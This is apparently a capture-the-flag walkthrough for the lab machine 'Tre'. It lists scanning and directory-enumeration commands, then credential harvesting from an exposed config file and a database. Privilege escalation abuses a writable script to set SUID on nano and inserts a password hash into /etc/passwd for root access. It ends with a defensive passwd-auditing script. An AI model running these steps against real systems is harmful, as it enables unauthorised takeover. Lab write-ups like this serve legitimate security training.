Tre
nmap 192.168.224.84 -sVC -A -p- --min-rate 10000

Ports 22 (ssh), 80 (http) and 8082 (http) were open, so I started with the web page on port 80; there was nothing interesting there.
Directory enumeration on the web ports



Option 1: Gobuster
gobuster dir -u http://192.168.224.84/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

gobuster dir -u http://192.168.224.84:8082/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -b "400,403,404" -t 50 -e -x "html,php,txt,jsp"
(gobuster dir -k -u https://10.10.10.60/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,cnf,conf)

We also tried the big.txt wordlist and found some more directories, so let us navigate to the directories it found.
gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://192.168.153.84/ -t 100 -x .html,.txt,.php > gobuster.txt


Option 2: dirsearch
dirsearch -u http://192.168.120.84/ -e php,txt,html -w /usr/share/wordlists/dirb/big.txt

Option 3: dirb
dirb http://192.168.120.84/

Option 4: ffuf
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.120.84/FUZZ -fl 480


Option 5: wfuzz
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 http://192.168.120.84/FUZZ

I visited /adminer.php and found a login page, but I had no credentials for it.

Initial Foothold
Next, I ran gobuster again against /mantisbt and found an interesting directory, /config.
gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://192.168.120.84/mantisbt/ -t 100 -x .html,.txt,.php > gobustermanisbt.txt



wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 http://192.168.120.84/mantisbt/FUZZ

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.120.84/mantisbt/FUZZ -fl 480


Navigating to the /config directory, I checked every file there; one of them, a.txt, looked interesting.

The contents of a.txt turned out to be credentials for the login page I had discovered earlier.

With those credentials in hand, I went back to /adminer.php and entered them.

I was able to log in successfully.
Next, I opened the mantis_user_table table and found credentials that could give me initial access to the target.


With the credentials tre:Tr3@123456A!, I logged in over SSH and grabbed the first flag from the local.txt file.

Privilege Escalation
First of all, I checked the user's privileges with sudo -l and found that the user can run the shutdown command as a privileged user.

Next I ran linpeas.sh and found something interesting: the file /usr/bin/check-system was writable.
Find SUID binaries
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null
SUID
SUID/Setuid stands for "set user ID upon execution"; it is supported by default in every Linux distribution. When a file with this bit set is executed, the effective uid of the process becomes that of the file's owner. If the file owner is root, the effective uid becomes root even when user bob runs it. The SUID bit is shown as an s in the owner's execute position of the mode string.
ls /usr/bin/sudo -alh
-rwsr-xr-x 1 root root 138K 23 nov. 16:04 /usr/bin/sudo
ps aux: this command showed nothing we could use.
ps aux | grep root


tre@tre:~$ ls -la /usr/bin/check-system

tre@tre:~$ cat /usr/bin/check-system

tre@tre:~$ nano /usr/bin/check-system

tre@tre:~$ sudo shutdown -r now
Log in again and run the command below to check that the SUID bit is now set on nano:
tre@tre:~$ ls -la /usr/bin/nano

Now we can edit the /etc/passwd file and add our own password to any user. Here we will add a password to the root user; we use openssl to generate the hash:
openssl passwd tre123

Now we edit /etc/passwd and put the hash $1$lmJB.4zs$8skJICPa1PykmVA.z1uo80 into the root entry:
tre@tre:~$ nano /etc/passwd


Ctrl+O and Ctrl+X: save and exit the file.
Now run the su root command and type the password.

Now we have a root shell.
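
As an added defensive check (not part of the original walkthrough), this Python audit parses an /etc/passwd-style file and flags what the edit above leaves behind: a password hash stored directly in /etc/passwd instead of the shadow file, a non-root account with UID 0, or an empty password field. The sample entries, and the hash value inside them, are constructed placeholders.

```python
import sys

# Constructed sample modelling the state after the walkthrough's edit:
# one account carries a crypt-style hash directly in /etc/passwd (placeholder
# value, not a real hash) and a second account has been given UID 0.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
tre:x:1000:1000:tre:/home/tre:/bin/bash
backup:$1$CONSTRUCTEDSALT$PLACEHOLDERHASHVALUE:34:34:backup:/var/backups:/bin/sh
toor:x:0:0:second root:/root:/bin/bash
"""

# Values that legitimately appear in the password field on a shadowed system.
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}


def audit_passwd(text):
    """Return (line_number, account, finding) tuples for suspicious entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, fields[0], "malformed entry"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if pw == "":
            findings.append((lineno, name, "empty password field (no password needed)"))
        elif pw not in SHADOWED_OR_LOCKED:
            # A hash placed here is used instead of the /etc/shadow entry;
            # this is exactly what the openssl passwd + nano edit above produces.
            findings.append((lineno, name, "hash stored in /etc/passwd"))
        if uid == "0" and name != "root":
            findings.append((lineno, name, "non-root account with UID 0"))
    return findings


if __name__ == "__main__":
    # Audit a real file when run directly: python3 audit_passwd.py /etc/passwd
    path = sys.argv[1] if len(sys.argv) > 1 else "/etc/passwd"
    with open(path) as fh:
        hits = audit_passwd(fh.read())
    for lineno, name, finding in hits:
        print(f"{path}:{lineno}: {name}: {finding}")
    sys.exit(1 if hits else 0)
```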
